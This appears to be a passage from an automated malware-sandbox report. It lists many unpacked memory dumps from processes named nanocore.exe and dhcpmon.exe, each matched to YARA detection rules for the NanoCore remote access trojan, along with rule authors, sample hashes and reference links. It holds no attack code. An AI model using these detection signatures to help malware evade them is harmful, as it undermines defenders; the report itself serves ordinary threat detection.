      Source: 13.2.dhcpmon.exe.33f5530.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 13.2.dhcpmon.exe.33f5530.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 13.2.dhcpmon.exe.33f5530.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 10.2.nanocore.exe.49c0000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.nanocore.exe.49c0000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.nanocore.exe.49c0000.9.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 10.1.nanocore.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.1.nanocore.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.1.nanocore.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.nanocore.exe.58b4629.13.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.2.nanocore.exe.58b4629.13.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.nanocore.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.nanocore.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.nanocore.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.nanocore.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.2.nanocore.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 2.2.nanocore.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.nanocore.exe.4a90000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.2.nanocore.exe.4a90000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 2.2.nanocore.exe.4a90000.8.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 13.2.dhcpmon.exe.4fa0000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 13.2.dhcpmon.exe.4fa0000.9.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 13.2.dhcpmon.exe.4fa0000.9.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 13.3.dhcpmon.exe.7130f0.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 13.3.dhcpmon.exe.7130f0.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 13.3.dhcpmon.exe.7130f0.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.nanocore.exe.58b0000.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.2.nanocore.exe.58b0000.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 2.2.nanocore.exe.4970000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.2.nanocore.exe.4970000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 2.2.nanocore.exe.4970000.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 10.2.nanocore.exe.34c5530.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.nanocore.exe.34c5530.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.nanocore.exe.34c5530.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.1.nanocore.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.1.nanocore.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 2.1.nanocore.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 11.2.dhcpmon.exe.233ba50.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 11.2.dhcpmon.exe.233ba50.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 11.2.dhcpmon.exe.47f0000.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 11.2.dhcpmon.exe.47f0000.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 11.2.dhcpmon.exe.47f0000.8.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 9.2.dhcpmon.exe.1ed70000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.dhcpmon.exe.1ed70000.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 9.2.dhcpmon.exe.1ed70000.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 8.2.nanocore.exe.1eed1458.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 8.2.nanocore.exe.1eed1458.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 8.2.nanocore.exe.1eed1458.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.nanocore.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.2.nanocore.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 2.2.nanocore.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 13.2.dhcpmon.exe.346e3b6.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 13.2.dhcpmon.exe.346e3b6.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 13.2.dhcpmon.exe.346e3b6.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.nanocore.exe.35b7815.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.2.nanocore.exe.35b7815.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 11.2.dhcpmon.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 11.2.dhcpmon.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 11.2.dhcpmon.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 10.2.nanocore.exe.34c5530.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.nanocore.exe.34c5530.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 10.2.nanocore.exe.34c5530.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 9.2.dhcpmon.exe.1ed70000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.dhcpmon.exe.1ed70000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 9.2.dhcpmon.exe.1ed70000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 11.2.dhcpmon.exe.715c48.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 11.2.dhcpmon.exe.715c48.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 11.2.dhcpmon.exe.715c48.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 13.2.dhcpmon.exe.3477815.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 13.2.dhcpmon.exe.3477815.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 1.2.nanocore.exe.1eed1458.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 1.2.nanocore.exe.1eed1458.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 1.2.nanocore.exe.1eed1458.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.2.nanocore.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 2.2.nanocore.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 2.2.nanocore.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 10.2.nanocore.exe.3547815.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 10.2.nanocore.exe.3547815.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 11.2.dhcpmon.exe.3357815.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 11.2.dhcpmon.exe.3357815.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 11.2.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 11.2.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 11.2.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 13.2.dhcpmon.exe.245ba50.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
